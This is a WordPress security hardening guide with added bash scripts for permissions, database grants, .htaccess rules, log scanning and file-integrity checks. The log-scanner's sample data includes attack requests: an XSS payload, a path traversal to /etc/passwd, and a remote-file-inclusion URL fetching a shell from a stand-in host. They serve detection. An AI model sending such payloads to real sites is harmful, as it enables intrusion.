Hardening WordPress – WordPress.org Forums


Security in WordPress is taken very seriously, but as with any other system there are potential security issues that may arise if some basic security precautions aren't taken. This article will go through some common forms of vulnerabilities, and the things you can do to help keep your WordPress installation secure.

This article is not the ultimate quick fix to your security concerns. If you have specific security concerns or doubts, you should discuss them with people whom you trust to have sufficient knowledge of computer security and WordPress.

What is Security?

Fundamentally, security is not about perfectly secure systems. Such a thing might well be impractical, or impossible to find and/or maintain. What security is, though, is risk reduction, not risk elimination. It is about employing all the appropriate controls available to you, within reason, that allow you to improve your overall posture, reducing the odds of making yourself a target and subsequently getting hacked.
Website Hosts

Often, a good place to start when it comes to website security is your hosting environment. Today, there are a number of options available to you, and while hosts offer security to a certain level, it is important to understand where their responsibility ends and yours begins. There is a good article explaining the complicated dynamic between web hosts and the security of your website. A secure server protects the privacy, integrity, and availability of the resources under the server administrator's control.

Qualities of a trusted web host might include:

- Readily discusses your security concerns and which security features and processes they offer with their hosting.
- Provides the most recent stable versions of all server software.
- Provides reliable methods for backup and recovery.

Decide which security you need on your server by determining the software and data that need to be secured. The rest of this guide will help you with this.

Website Applications

It is easy to look at web hosts and pass the responsibility of security to them, but a tremendous amount of security lies with the website owner as well. Web hosts are often responsible for the infrastructure on which your website sits; they are not responsible for the application you choose to install.

To understand where and why this is important you must understand how websites get hacked. Rarely is it attributed to the infrastructure; most often it is attributed to the application itself (i.e., the environment you are responsible for).

Security Themes

Keep in mind some general ideas while considering security for each aspect of your system:

Limiting access: Making smart choices that reduce the possible entry points available to a malicious person.

Containment: Your system should be configured to minimize the amount of damage that can be done in the event that it is compromised.

Preparation and knowledge: Keeping backups and knowing the state of your WordPress installation at regular intervals. Having a plan to back up and recover your installation in the case of catastrophe can help you get back online faster in the case of a problem.

Trusted sources: Do not get plugins/themes from untrusted sources. Restrict yourself to the WordPress.org repository or well known companies. Trying to get plugins/themes from elsewhere may lead to issues.
Vulnerabilities on Your Computer

Make sure the computers you use are free of spyware, malware, and virus infections. No amount of security in WordPress or on your web server will make the slightest difference if there is a keylogger on your computer.

Always keep your operating system and the software on it, especially your web browser, up to date to protect you from security vulnerabilities. If you are browsing untrusted sites, we also recommend using tools like NoScript (or disabling JavaScript/Flash/Java) in your browser.

Vulnerabilities in WordPress

Like many modern software packages, WordPress is updated regularly to address new security issues that may arise. Improving software security is always an ongoing concern, and to that end you should always keep up to date with the latest version of WordPress. Older versions of WordPress are not maintained with security updates.

Updating WordPress

Main article: Updating WordPress.

The latest version of WordPress is always available from the main WordPress website at https://wordpress.org. Official releases are not available from other sites; never download or install WordPress from any website other than https://wordpress.org.

Since version 3.7, WordPress has featured automatic updates. Use this functionality to ease the process of keeping up to date. You can also use the WordPress Dashboard to keep informed about updates. Read the entry in the Dashboard or the WordPress Developer Blog to determine what steps you must take to update and remain secure.

If a vulnerability is discovered in WordPress and a new version is released to address the issue, the information required to exploit the vulnerability is almost certainly in the public domain. This makes old versions more open to attack, and is one of the primary reasons you should always keep WordPress up to date.

If you are an administrator in charge of more than one WordPress installation, consider using Subversion to make management easier.

Reporting Security Issues

If you think you have found a security flaw in WordPress, you can help by reporting the issue. See the Security FAQ for information on how to report security issues.

If you think you have found a bug, report it. See Submitting Bugs for how to do this. You might have uncovered a vulnerability, or a bug that could lead to one.
Web Server Vulnerabilities

The web server running WordPress, and the software on it, can have vulnerabilities. Therefore, make sure you are running secure, stable versions of your web server and the software on it, or make sure you are using a trusted host that takes care of these things for you.

If you are on a shared server (one that hosts other websites besides your own) and a website on the same server is compromised, your website can potentially be compromised too, even if you follow everything in this guide. Be sure to ask your web host what security precautions they take.

Network Vulnerabilities

The network on both ends, the WordPress server side and the client network side, should be trusted. That means updating firewall rules on your home router and being careful about what networks you work from. An Internet cafe where you are sending passwords over an unencrypted connection, wireless or otherwise, is not a trusted network.

Your web host should be making sure that their network is not compromised by attackers, and you should do the same. Network vulnerabilities can allow passwords and other sensitive information to be intercepted.

Passwords

Many potential vulnerabilities can be avoided with good security habits. A strong password is an important aspect of this.

The goal with your password is to make it hard for other people to guess and hard for a brute force attack to succeed. Many automatic password generators are available that can be used to create secure passwords.

WordPress also features a password strength meter which is shown when changing your password in WordPress. Use this when changing your password to ensure its strength is adequate.

Things to avoid when choosing a password:

- Any permutation of your own real name, username, company name, or name of your website.
- A word from a dictionary, in any language.
- A short password.
- Any numeric-only or alphabetic-only password (a mixture of both is best).

A strong password is necessary not just to protect your blog content. An attacker who gains access to your administrator account is able to install malicious scripts that can potentially compromise your entire server.

In addition to using a strong password, it is a good idea to enable two-step (two-factor) authentication as an additional security measure.
FTP

When connecting to your server you should use SFTP if your web host provides it. If you are unsure whether your web host provides SFTP or not, just ask them.

Using SFTP feels the same as FTP from the client side, except that your password and all other data travel over an encrypted SSH connection between your computer and your website. This means your password is never sent in the clear and cannot be intercepted by an attacker.

File Permissions

Some neat features of WordPress come from allowing various files to be writable by the web server. However, allowing write access to your files is potentially dangerous, particularly in a shared hosting environment.

It is best to lock down your file permissions as much as possible and to loosen those restrictions only on the occasions that you need to allow write access, or to create specific folders with fewer restrictions for the purpose of doing things like uploading files.

Here is one possible permission scheme.

All files should be owned by your user account, and should be writable by you. Any file that needs write access from WordPress should be writable by the web server; if your hosting setup requires it, that may mean those files need to be group-owned by the user account used by the web server process.

/ The root WordPress directory: all files should be writable only by your user account, except .htaccess if you want WordPress to automatically generate rewrite rules for you.

/wp-admin/ The WordPress administration area: all files should be writable only by your user account.

/wp-includes/ The bulk of WordPress application logic: all files should be writable only by your user account.

/wp-content/ User-supplied content: intended to be writable by your user account and the web server process.

Within /wp-content/ you will find:

/wp-content/themes/ Theme files. If you want to use the built-in theme editor, all files need to be writable by the web server process. If you do not want to use the built-in theme editor, all files can be writable only by your user account.

/wp-content/plugins/ Plugin files: all files should be writable only by your user account.

Other directories that may be present within /wp-content/ should be documented by whichever plugin or theme requires them. Permissions may vary.
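The scheme above as a script, added here as an example; it is not part of the WordPress.org article. It applies the layout just described: everything owned by your account, directories 755 and files 644, wp-content/ group-writable so the web server (assumed to share a group with your account) can write uploads, plugins/ and themes/ kept read-only because the built-in editor is not wanted, and wp-config.php readable by owner and group only. The owner and group names are assumptions you pass in, and the root .htaccess is left read-only, so loosen it yourself if you want WordPress to write rewrite rules.

```bash
#!/usr/bin/env bash
# Added example (not from the WordPress.org article): apply the ownership and
# permission scheme described in "File Permissions" to a WordPress tree.
#   - directories 755, files 644, owned by the deploy user
#   - wp-content/ group-writable (775/664) so the web server can write uploads
#   - wp-content/plugins and wp-content/themes stay 755/644 (no built-in editor)
#   - wp-config.php 440: owner and web server group may read, nobody else
# Assumptions (not from the article): the deploy user and the web server process
# share the group you pass as WEBGROUP; run as root, or as the owner with no OWNER.
set -u

# wp_harden_perms ROOT [OWNER] [WEBGROUP]
# chown is skipped when OWNER is empty so the function also works without root.
wp_harden_perms() {
  local root="$1" owner="${2-}" group="${3-}" d
  [ -d "$root/wp-includes" ] || { echo "not a WordPress root: $root" >&2; return 1; }

  if [ -n "$owner" ]; then
    chown -R "$owner${group:+:$group}" "$root"
  fi

  # Baseline: nothing writable by the web server, nothing executable but directories.
  find "$root" -type d -exec chmod 755 {} +
  find "$root" -type f -exec chmod 644 {} +

  # wp-content must be writable by the web server (uploads, caches), via the group.
  if [ -d "$root/wp-content" ]; then
    find "$root/wp-content" -type d -exec chmod 775 {} +
    find "$root/wp-content" -type f -exec chmod 664 {} +
    # Plugin and theme code is read-only unless you want the Dashboard editor.
    for d in plugins themes; do
      [ -d "$root/wp-content/$d" ] || continue
      find "$root/wp-content/$d" -type d -exec chmod 755 {} +
      find "$root/wp-content/$d" -type f -exec chmod 644 {} +
    done
  fi

  # Credentials: owner and web server group may read, nobody else (the 440 option).
  [ -f "$root/wp-config.php" ] && chmod 440 "$root/wp-config.php"
  return 0
}

# wp_check_perms ROOT: prints the number of violations, i.e. anything world-writable
# plus anything group-writable outside wp-content/. 0 means the tree matches the scheme.
wp_check_perms() {
  local root="$1" n
  n=$(find "$root" -perm -o+w | wc -l)
  n=$((n + $(find "$root" -path "$root/wp-content" -prune -o -perm -g+w -print | wc -l)))
  echo "$n"
}

if [ $# -gt 0 ]; then
  wp_harden_perms "$@" && echo "remaining violations: $(wp_check_perms "$1")"
fi
```

Run it after every deploy (for example wp_harden_perms /var/www/html deploy www-data, names assumed); wp_check_perms on its own makes a cheap cron check that alerts when something, a plugin installer or an attacker, has loosened the tree again.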
Changing file permissions

If you have shell access to your server, you can change file permissions recursively with the following commands.

For directories:

find /path/to/your/wordpress/install/ -type d -exec chmod 755 {} \;

For files:

find /path/to/your/wordpress/install/ -type f -exec chmod 644 {} \;

Regarding Automatic Updates

When you tell WordPress to perform an automatic update, all file operations are performed as the user that owns the files, not as the web server's user. All files are set to 0644 and all directories are set to 0755: writable only by the owner and readable by everyone else, including the web server.

Database Security

If you run multiple blogs on the same server, it is wise to consider keeping them in separate databases, each managed by a different user. This is best accomplished when performing the initial WordPress installation. This is a containment strategy: if an intruder successfully cracks one WordPress installation, this makes it that much harder to alter your other blogs.

If you administer MySQL yourself, ensure that you understand your MySQL configuration and that unneeded features (such as accepting remote TCP connections) are disabled. See Secure MySQL Database Design for a nice introduction.

Restricting Database User Privileges

For normal WordPress operations, such as posting blog posts, uploading media files, posting comments, creating new WordPress users and installing WordPress plugins, the MySQL database user only needs data read and data write privileges on the MySQL database: SELECT, INSERT, UPDATE and DELETE.

Therefore any other database structure and administration privileges, such as DROP, ALTER and GRANT, can be revoked. By revoking such privileges you are also improving the containment policies.

Note: Some plugins, themes and major WordPress updates might require making database structural changes, such as adding new tables or changing the schema. In such a case, before installing the plugin or updating the software, you will need to temporarily allow the database user the required privileges.
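The two states described above, day-to-day restriction and a temporary elevation for schema changes, as a small helper that emits the corresponding GRANT/REVOKE statements. This is an added example, not part of the WordPress.org article: the database name, account and host are assumed placeholders, and the "upgrade" privilege set (CREATE, ALTER, DROP, INDEX, LOCK TABLES) is an assumption about what core and plugin schema changes need, not a list from the article. Identifiers are validated rather than escaped so the helper cannot itself become an injection vector when fed from a deploy pipeline.

```bash
#!/usr/bin/env bash
# Added example (not from the WordPress.org article): print the SQL that switches the
# WordPress database account between the two states described in "Restricting Database
# User Privileges". Pipe the output into the mysql client as an administrative user:
#   wp_db_grants restrict wordpress wp_user localhost | mysql -u root -p
#   wp_db_grants upgrade  wordpress wp_user localhost | mysql -u root -p   # before an update
# Assumption (not from the article): CREATE, ALTER, DROP, INDEX and LOCK TABLES are
# sufficient for schema-changing updates; adjust if a plugin documents more.
set -u

# Identifiers are interpolated into SQL, so refuse anything outside a safe character set
# instead of trying to escape it ('%' is allowed because it is the MySQL host wildcard).
_ident_ok() { printf '%s' "$1" | grep -Eq '^[A-Za-z0-9_.%-]+$'; }

# wp_db_grants MODE DB USER HOST   (MODE is "restrict" or "upgrade")
wp_db_grants() {
  local mode="$1" db="$2" user="$3" host="$4"
  _ident_ok "$db" && _ident_ok "$user" && _ident_ok "$host" || {
    echo "refusing unsafe identifier" >&2; return 2; }
  case "$mode" in
    restrict)
      # Start from nothing, then allow only the four data privileges WordPress uses daily.
      printf "REVOKE ALL PRIVILEGES ON \`%s\`.* FROM '%s'@'%s';\n" "$db" "$user" "$host"
      printf "GRANT SELECT, INSERT, UPDATE, DELETE ON \`%s\`.* TO '%s'@'%s';\n" "$db" "$user" "$host"
      ;;
    upgrade)
      # Temporarily add the structural privileges an update may need; run "restrict" afterwards.
      printf "GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, ALTER, DROP, INDEX, LOCK TABLES ON \`%s\`.* TO '%s'@'%s';\n" "$db" "$user" "$host"
      ;;
    *) echo "mode must be restrict or upgrade" >&2; return 2 ;;
  esac
  # SHOW GRANTS at the end lets you eyeball the result in the same mysql session.
  printf "FLUSH PRIVILEGES;\nSHOW GRANTS FOR '%s'@'%s';\n" "$user" "$host"
}

if [ $# -gt 0 ]; then wp_db_grants "$@"; fi
```

Note that REVOKE on a database the account has no grants on fails with "There is no such grant defined"; in that case there is nothing to take away and only the GRANT line needs to run.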
WARNING: Attempting updates without having these privileges can cause problems when database schema changes occur. Thus, it is NOT recommended to revoke these privileges. If you do feel the need to do this for security reasons, then please make sure that you have a solid backup plan in place first, with regular whole-database backups which you have tested are valid and that can be easily restored. A failed database upgrade can usually be solved by restoring the database back to an old version, granting the proper permissions, and then letting WordPress try the database update again. Restoring the database will return it to that old version and the WordPress administration screens will then detect the old version and allow you to run the necessary SQL commands on it. Most WordPress upgrades do not change the schema, but some do. Only major point upgrades (3.7 to 3.8, for example) will alter the schema. Minor upgrades (3.8 to 3.8.1) will generally not. Nevertheless, keep a regular backup.

Securing wp-admin

Adding server-side password protection (such as Basic Auth) to /wp-admin/ adds a second layer of protection around your blog's admin area, the login screen, and your files. This forces an attacker or bot to attack this second layer of protection instead of your actual admin files. Many WordPress attacks are carried out autonomously by malicious software bots.

Simply securing the wp-admin/ directory might also break some WordPress functionality, such as the AJAX handler at wp-admin/admin-ajax.php. See the Resources section for more documentation on how to password protect your wp-admin/ directory properly.

The most common attacks against a WordPress blog usually fall into two categories:

- Sending specially-crafted HTTP requests to your server with specific exploit payloads for specific vulnerabilities. These target old/outdated plugins and software.
- Attempting to gain access to your blog by "brute-force" password guessing.

The ultimate implementation of this "second layer" password protection is to require an HTTPS (TLS) encrypted connection for administration, so that all communication and sensitive data is encrypted. See Administration Over SSL.
Securing wp-includes

A second layer of protection can be added where scripts are generally not intended to be accessed by any user. One way to do that is to block those scripts using mod_rewrite in the .htaccess file. Note: to ensure the code below is not overwritten by WordPress, place it outside the # BEGIN WordPress and # END WordPress tags in the .htaccess file. WordPress can overwrite anything between these tags.

# Block the include-only files.
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]

# BEGIN WordPress

Note that this will not work well on Multisite, as RewriteRule ^wp-includes/[^/]+\.php$ - [F,L] would prevent the ms-files.php file from generating images. Omitting that line will allow the code to work, but offers less security.

Securing wp-config.php

You can move the wp-config.php file to the directory above your WordPress install. This means that for a site installed in the root of your webspace, you can store wp-config.php outside the web-root folder.

Note: Some people assert that moving wp-config.php has minimal security benefits and, if not done carefully, may actually introduce serious vulnerabilities. Others disagree.

Note that wp-config.php can be stored ONE directory level above the WordPress installation (the directory where wp-includes resides). Also, make sure that only you (and the web server) can read this file; that generally means a 400 or 440 permission.
If you use a server with .htaccess, you can put this in that file (at the very top) to deny access to anyone surfing for it:

<Files wp-config.php>
order allow,deny
deny from all
</Files>

On Apache 2.4 and later the equivalent inside the same <Files> block is Require all denied; the order/deny directives only keep working there if mod_access_compat is loaded.

Disable File Editing

The WordPress Dashboard by default allows administrators to edit PHP files, such as plugin and theme files. This is often the first tool an attacker will use if able to log in, since it allows code execution. WordPress has a constant to disable editing from the Dashboard. Placing this line in wp-config.php is equivalent to removing the 'edit_themes', 'edit_plugins' and 'edit_files' capabilities of all users:

define('DISALLOW_FILE_EDIT', true);

This will not prevent an attacker from uploading malicious files to your site, but might stop some attacks.

Plugins

First of all, make sure your plugins are always updated. Also, if you are not using a specific plugin, delete it from the system.

Firewall

There are many plugins and services that can act as a firewall for your website. Some of them work by modifying your .htaccess file and restricting some access at the Apache level, before it is processed by WordPress. Good examples are iThemes Security and All in One WP Security. Some firewall plugins act at the WordPress level, like Wordfence and Shield, and try to filter attacks as WordPress is loading, but before it is fully processed.

Besides plugins, you can also install a WAF (web application firewall) at your web server to filter content before it is processed by WordPress. The most popular open source WAF is ModSecurity.

A website firewall can also be added as an intermediary between the traffic from the internet and your hosting server. These services all function as reverse proxies: they accept the initial requests and reroute them to your server, stripping out all malicious requests. They accomplish this by modifying your DNS records, via an A record or a full DNS swap, so that all traffic passes through the provider's network first and is filtered by the firewall before reaching your site. A few companies offer such a service, like CloudFlare, Sucuri and Incapsula.

Additionally, these third-party service providers function as Content Delivery Networks (CDNs) by default, introducing performance optimization and global reach.
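Returning to the two .htaccess fragments above (the wp-includes blocking rules and the wp-config.php deny): the detail that trips people up is placement, because WordPress rewrites everything between its own # BEGIN WordPress and # END WordPress markers. The following script, added here as an example and not part of the WordPress.org article, installs both fragments as one block immediately above the WordPress marker and refuses to add it twice. It assumes Apache 2.4 syntax (Require all denied) with mod_rewrite enabled, and the # BEGIN hardening / # END hardening markers are our own invention, used only so the script can tell whether it has already run.

```bash
#!/usr/bin/env bash
# Added example, not part of the WordPress.org article: install the wp-includes blocking
# rules and the wp-config.php deny rule into an existing .htaccess, ABOVE the
# "# BEGIN WordPress" marker, because WordPress rewrites everything between its own
# BEGIN/END markers. Assumptions (not from the article): Apache 2.4 ("Require all denied"),
# mod_rewrite enabled, and our own "# BEGIN/END hardening" markers for idempotence.
set -u

wp_hardening_rules() {
  cat <<'EOF'
# BEGIN hardening
# Nobody fetches the database credentials over HTTP.
<Files wp-config.php>
    Require all denied
</Files>
# Block the include-only files (see "Securing wp-includes").
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
# END hardening
EOF
}

# wp_install_hardening HTACCESS
# Inserts the block just before "# BEGIN WordPress" (or at the top when there is no
# marker yet). A second run is a no-op, so it is safe to call from a deploy script.
wp_install_hardening() {
  local file="$1" tmp n
  [ -f "$file" ] || : > "$file"
  if grep -q '^# BEGIN hardening' "$file"; then
    echo "hardening block already present in $file"
    return 0
  fi
  tmp=$(mktemp) || return 1
  n=$(grep -n -m1 '^# BEGIN WordPress' "$file" | cut -d: -f1)
  if [ -n "$n" ]; then
    { head -n $((n - 1)) "$file"; wp_hardening_rules; tail -n +"$n" "$file"; } > "$tmp"
  else
    { wp_hardening_rules; cat "$file"; } > "$tmp"
  fi
  cat "$tmp" > "$file" && rm -f "$tmp"   # cat, not mv: the file keeps its owner and mode
}

# wp_hardening_ok HTACCESS: returns 0 when exactly one hardening block exists and it sits
# above the WordPress block. Useful as a post-deploy check that WordPress has not eaten it.
wp_hardening_ok() {
  local file="$1" ours wp
  ours=$(grep -n '^# BEGIN hardening' "$file" | cut -d: -f1)
  wp=$(grep -n -m1 '^# BEGIN WordPress' "$file" | cut -d: -f1)
  [ -n "$ours" ] || return 1
  [ $(printf '%s\n' "$ours" | wc -l) -eq 1 ] || return 1
  [ -z "$wp" ] || [ "$ours" -lt "$wp" ]
}

if [ $# -gt 0 ]; then
  wp_install_hardening "$1" && wp_hardening_ok "$1" && echo "hardening block in place: $1"
fi
```

The Multisite caveat from the wp-includes section still applies: drop the ^wp-includes/[^/]+\.php$ line from wp_hardening_rules on a network install.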
Plugins that need write access

If a plugin wants write access to your WordPress files and directories, please read the code to make sure it is legitimate, or check with someone you trust. Possible places to check are the Support Forums and the IRC channel.

Code execution plugins

As we said, part of the goal of hardening WordPress is containing the damage done if there is a successful attack. Plugins which allow arbitrary PHP or other code to execute from entries in a database effectively magnify the possibility of damage in the event of a successful attack.

A way to avoid using such a plugin is to use custom page templates that call the function. Part of the security this affords is active only when you disallow file editing within WordPress.

Security through obscurity

Security through obscurity is generally an unsound primary strategy. However, there are areas in WordPress where obscuring information might help with security:

Rename the administrative account: When creating an administrative account, avoid easily guessed terms such as admin or webmaster as usernames, because they are typically subject to attacks first. On an existing WordPress install you may rename the existing account in the MySQL command-line client with a command like

UPDATE wp_users SET user_login = 'newuser' WHERE user_login = 'admin';

or by using a MySQL frontend like phpMyAdmin. Keep in mind that the account's user_nicename (the author slug shown in author archive URLs) is public and still reveals the old name unless you change it too.

Change the table_prefix: Many published WordPress-specific SQL-injection attacks make the assumption that the table_prefix is wp_, the default. Changing this can block at least some SQL injection attacks.

Data Backups

Back up your data regularly, including your MySQL databases. See the main article: Backing Up Your Database.

Data integrity is critical for trusted backups. Encrypting the backup, keeping an independent record of cryptographic hashes for each backup file (SHA-256 rather than MD5, which is no longer collision-resistant), and/or placing backups on read-only media increases your confidence that your data has not been tampered with.
A sound backup strategy could include keeping a set of regularly-timed snapshots of your entire WordPress installation (including WordPress core files and your database) in a trusted location. Imagine a site that makes weekly snapshots. Such a strategy means that if a site is compromised on May 1st but the compromise is not detected until May 12th, the site owner will have pre-compromise backups that can help in rebuilding the site, and possibly even post-compromise backups which will aid in determining how the site was compromised.

Logging

Logs are your best friend when it comes to understanding what is happening with your website, especially if you are trying to perform forensics. Logs let you see what was done, from where, and when. They will not tell you which WordPress username logged in, but they will let you identify the IP address and the time and, more importantly, the actions the attacker might have taken. You will be able to see attacks such as Cross Site Scripting (XSS), Remote File Inclusion (RFI), Local File Inclusion (LFI) and directory traversal attempts in the logs. You will also be able to see brute force attempts. There are various examples and tutorials available to help guide you through the process of parsing and analyzing your raw logs.

As you get more comfortable with your logs you will be able to see things like when the theme and plugin editors are being used, when someone updates your widgets, and when posts and pages are added: all key elements when doing forensic work on your web server. There are a few WordPress security plugins that assist you with this as well, like the Sucuri Auditing tool or the Audit Trail plugin.

From a security perspective there are two key open-source tools you will want on your web server, as part of a layered approach to security: a web application firewall such as ModSecurity (see Firewall above), and a host-based intrusion detection system, OSSEC.

OSSEC can run on any *NIX distribution and will also run on Windows. When configured correctly it is very powerful. The idea is to correlate and aggregate all the logs. You have to be sure to configure it to capture all access_logs and error_logs, and if you have multiple websites on the server, account for that. You will also want to be sure to filter out the noise. By default you will see a lot of noise, and you will want to tune the configuration for it to be really effective.
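What "seeing XSS, RFI, LFI and brute force attempts in the logs" looks like in practice, as an added example that is not part of the WordPress.org article: a scanner over a combined-format access log that tags each request by attack class and client IP, and counts login POSTs per IP. The log lines embedded in wp_sample_log are constructed for the example (RFC 5737 documentation addresses), not real traffic. Two things here are assumptions rather than anything the article says: POSTs to xmlrpc.php are counted as login attempts together with wp-login.php, and the BRUTE_THRESHOLD of 5 is an arbitrary cut-off per log file.

```bash
#!/usr/bin/env bash
# Added example, not part of the WordPress.org article: pull the attack classes the
# Logging section names (XSS, RFI, LFI / directory traversal, brute force) out of a
# combined-format web server access log, keyed by client IP. The sample log at the bottom
# is constructed; on a real host run it against access.log. Assumptions not in the article:
# POSTs to xmlrpc.php count as login attempts alongside wp-login.php, and BRUTE_THRESHOLD
# (default 5) is an arbitrary cut-off for one log file.
set -u
BRUTE_THRESHOLD=${BRUTE_THRESHOLD:-5}

# wp_scan_log FILE -> sorted "CLASS<TAB>IP<TAB>DETAIL" lines. The patterns are loose on
# purpose: this is triage that tells you which IPs to look at, not a WAF rule set.
wp_scan_log() {
  awk -v thr="$BRUTE_THRESHOLD" '
    {
      # Combined log format: $1 client IP, $6 "METHOD (with the opening quote), $7 URI.
      ip = $1; uri = $7; u = tolower(uri)
      if (u ~ /%3cscript|<script|onerror%3d|javascript%3a/)        printf "XSS\t%s\t%s\n", ip, uri
      if (u ~ /=(https?|ftp)(%3a|:)(%2f%2f|\/\/)/)                  printf "RFI\t%s\t%s\n", ip, uri
      if (u ~ /\.\.\/|%2e%2e%2f|%2e%2e\/|\/etc\/passwd|php:\/\//)  printf "LFI\t%s\t%s\n", ip, uri
      if ($6 == "\"POST" && u ~ /^\/(wp-login|xmlrpc)\.php/)       login[ip]++
    }
    END {
      for (ip in login)
        if (login[ip] >= thr)
          printf "BRUTE\t%s\t%d POSTs to wp-login.php/xmlrpc.php\n", ip, login[ip]
    }' "$1" | sort
}

# wp_sample_log: constructed sample lines (RFC 5737 addresses), not real traffic.
wp_sample_log() {
  cat <<'EOF'
203.0.113.7 - - [12/May/2023:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2023:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2023:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2023:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2023:10:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2023:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2023:10:01:13 +0000] "GET /?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "curl/7.88.1"
198.51.100.4 - - [12/May/2023:10:01:20 +0000] "GET /wp-content/plugins/old/view.php?file=../../../../etc/passwd HTTP/1.1" 404 196 "-" "curl/7.88.1"
198.51.100.9 - - [12/May/2023:10:02:00 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 812 "-" "python-requests/2.31"
192.0.2.10 - - [12/May/2023:10:03:00 +0000] "GET /2023/05/hello-world/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [12/May/2023:10:03:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.test/wp-login.php" "Mozilla/5.0"
EOF
}

if [ $# -gt 0 ]; then wp_scan_log "$1"; fi
```

On the sample data the scanner reports one BRUTE finding (203.0.113.7, six login POSTs), one XSS and one LFI from 198.51.100.4, and one RFI from 198.51.100.9; the single legitimate login from 192.0.2.10 stays below the threshold. Every finding carries the IP and the raw URI, which is exactly the evidence the paragraph says the logs give you when a username is not recorded.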
Monitoring

Sometimes prevention is not enough and you may still be hacked. That is why intrusion detection and monitoring are very important. They will allow you to react faster, find out what happened, and recover your site.

Monitoring your logs

If you are on a dedicated or virtual private server, where you have the luxury of root access, you can easily configure things so that you can see what is going on. OSSEC easily facilitates this, and here is a little write-up that might help you out: OSSEC for Website Security – Part I.

Monitoring your files for changes

When an attack happens, it always leaves traces, either in the logs or on the file system (new files, modified files, etc.). If you are using OSSEC, for example, it will monitor your files and alert you when they change.

Goals

The goals of file system tracking include:

- Monitor changed and added files
- Log changes and additions
- Ability to revert granular changes
- Automated alerts

General approaches

Administrators can monitor the file system via general technologies such as:

- System utilities
- Revision control
- OS/kernel level monitoring

Specific tools

Options for file system monitoring include:

- diff: build a clean test copy of your site and compare it against production
- Git: source code management
- inotify and incron: OS kernel level file monitoring service that can run commands on file system events
- Watcher: Python inotify library
- OSSEC: open source host-based intrusion detection system that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response

Considerations

When configuring a file based monitoring strategy, there are many considerations, including the following.

Run the monitoring script/service as root: This makes it hard for attackers to disable or modify your file system monitoring solution.

Disable monitoring during scheduled maintenance/upgrades: This prevents unnecessary notifications when you are performing regular maintenance on the site.

Monitor only executable file types: It may be reasonably safe to monitor only executable file types, such as .php files. Filtering out non-executable files may reduce unnecessary log entries and alerts. Do keep .htaccess in scope, though, since it decides how the server interprets other files.
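A minimal file integrity check in the spirit of the "diff" option above, added here as an example that is not part of the WordPress.org article. It follows three of the considerations just listed: it is meant to be run as root from cron, it skips the run while a maintenance flag file exists, and it hashes only web-executable files (.php by default, plus .htaccess). Assumptions not in the article: GNU sha256sum is installed, and the baseline file lives outside the web root where the web server user cannot write to it; the .maintenance default for the flag relies on the fact that WordPress creates that file in its root while a core update runs.

```bash
#!/usr/bin/env bash
# Added example, not part of the WordPress.org article: a minimal file integrity check
# (the "diff" option from "Specific tools"). Run as root from cron; it skips the run while a
# maintenance flag exists and hashes only .php files and .htaccess. Assumptions (not from
# the article): sha256sum is available and BASELINE is stored outside the web root.
set -u
WATCH_EXT=${WATCH_EXT:-php}

# wp_fim_snapshot ROOT -> "hash  ./relative/path" lines, sorted by path
wp_fim_snapshot() {
  ( cd "$1" && find . -type f \( -name "*.$WATCH_EXT" -o -name .htaccess \) -exec sha256sum {} + | sort -k 2 )
}

# wp_fim_baseline ROOT BASELINE: record the known-good state right after a clean deploy.
wp_fim_baseline() { wp_fim_snapshot "$1" > "$2"; }

# wp_fim_check ROOT BASELINE [FLAG]
# Prints "ADDED|REMOVED|MODIFIED path" lines. Exit 0: clean, 1: changes found, 3: skipped
# because FLAG (default ROOT/.maintenance, created by WordPress during core updates) exists.
wp_fim_check() {
  local root="$1" base="$2" flag="${3:-$1/.maintenance}" cur changes
  if [ -e "$flag" ]; then
    echo "SKIPPED: maintenance flag $flag present" >&2
    return 3
  fi
  cur=$(mktemp) || return 2
  wp_fim_snapshot "$root" > "$cur"
  # Baseline entries are read first (keyed by path); everything else is the current state.
  changes=$(awk -v base="$base" '
    FILENAME == base { b[$2] = $1; next }
    { c[$2] = $1 }
    END {
      for (p in b) if (!(p in c)) print "REMOVED " p
      for (p in c) if (!(p in b)) print "ADDED " p
      for (p in c) if ((p in b) && b[p] != c[p]) print "MODIFIED " p
    }' "$base" "$cur" | sort)
  rm -f "$cur"
  [ -z "$changes" ] && return 0
  printf '%s\n' "$changes"
  return 1
}

if [ $# -gt 1 ]; then wp_fim_check "$1" "$2"; fi
```

Re-run wp_fim_baseline only after you have deliberately changed code (deploy, update), so that an ADDED webshell under wp-content/uploads or a MODIFIED core file shows up on the next cron run instead of being silently accepted.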
Use strict file system permissions: Read about securing file permissions and ownership above. In general, avoid allowing execute and write permissions to the extent possible.

Monitoring your web server externally

If an attacker tries to deface your site or add malware, you can also detect these changes by using a web-based integrity monitoring solution. This comes in many forms today; use your favorite search engine and look for "web malware detection and remediation" and you will likely get a long list of service providers.

Resources

- How to Improve WordPress Security (Infographic)
- Security Plugins
